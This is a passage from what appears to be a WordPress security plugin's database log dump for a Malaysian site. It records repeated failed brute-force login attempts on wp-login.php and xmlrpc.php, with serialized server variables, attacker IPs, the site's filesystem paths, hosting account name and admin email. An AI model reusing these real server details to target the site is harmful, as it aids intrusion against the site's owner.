Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.158.212.40\";s:11:\"REMOTE_PORT\";s:5:\"55042\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwkIN9YzdT54U4Mrp-6mwAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567368224.6905\";s:12:\"REQUEST_TIME\";s:10:\"1567368224\";}}','notice','2019-09-01 20:03:45','2019-09-01 20:03:45',17688848,19179464,'https://bintara.com.my/wp-login.php',1,0,'185.158.212.40'),(23491,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.158.212.40\";s:11:\"REMOTE_PORT\";s:5:\"55368\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwkI99YzdT54U4Mrp-6ngAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567368227.2803\";s:12:\"REQUEST_TIME\";s:10:\"1567368227\";}}','notice','2019-09-01 20:03:48','2019-09-01 20:03:47',18202048,19499160,'https://bintara.com.my/xmlrpc.php',1,0,'185.158.212.40'),(23492,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"97.74.6.168\";s:11:\"REMOTE_PORT\";s:5:\"48024\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwq599YzdT54U4Mrp8CygAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567369959.4072\";s:12:\"REQUEST_TIME\";s:10:\"1567369959\";}}','notice','2019-09-01 20:32:40','2019-09-01 20:32:39',17688568,19178920,'https://bintara.com.my/wp-login.php',1,0,'97.74.6.168'),(23493,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"97.74.6.168\";s:11:\"REMOTE_PORT\";s:5:\"48454\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwq6t9YzdT54U4Mrp8CzAAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567369962.1843\";s:12:\"REQUEST_TIME\";s:10:\"1567369962\";}}','notice','2019-09-01 20:32:43','2019-09-01 20:32:42',18202088,19498712,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.6.168'),(23494,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.140.192\";s:11:\"REMOTE_PORT\";s:5:\"49312\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwuXN9YzdT54U4Mrp8GXQAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567370844.9933\";s:12:\"REQUEST_TIME\";s:10:\"1567370844\";}}','notice','2019-09-01 20:47:26','2019-09-01 20:47:25',17691840,19177288,'https://bintara.com.my/wp-login.php',1,0,'142.93.140.192'),(23474,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-31 19:41:44','2019-08-31 19:41:41',17688632,18151848,'http://bintara.com.my/?page_id=18',1,0,'77.126.34.53'),(23495,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.140.192\";s:11:\"REMOTE_PORT\";s:5:\"49312\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwuXN9YzdT54U4Mrp8GXQAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567370844.9933\";s:12:\"REQUEST_TIME\";s:10:\"1567370844\";}}','notice','2019-09-01 20:47:26','2019-09-01 20:47:25',17852968,19177288,'https://bintara.com.my/wp-login.php',1,0,'142.93.140.192'),(23496,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.140.192\";s:11:\"REMOTE_PORT\";s:5:\"49758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwuYFvRyrCg9V6axS2oCAAAAU0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567370848.2379\";s:12:\"REQUEST_TIME\";s:10:\"1567370848\";}}','notice','2019-09-01 20:47:29','2019-09-01 20:47:28',18202824,19500440,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.140.192'),(23497,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.50.204\";s:11:\"REMOTE_PORT\";s:5:\"37090\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwx8d9YzdT54U4Mrp8JuAAAAYo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567371761.7882\";s:12:\"REQUEST_TIME\";s:10:\"1567371761\";}}','notice','2019-09-01 21:02:42','2019-09-01 21:02:42',17687432,19177120,'https://bintara.com.my/wp-login.php',1,0,'171.244.50.204'),(23498,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.50.204\";s:11:\"REMOTE_PORT\";s:5:\"37636\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwx81vRyrCg9V6axS2pPwAAAUU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567371763.9195\";s:12:\"REQUEST_TIME\";s:10:\"1567371763\";}}','notice','2019-09-01 21:02:45','2019-09-01 21:02:44',18202048,19499160,'https://bintara.com.my/xmlrpc.php',1,0,'171.244.50.204'),(23499,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP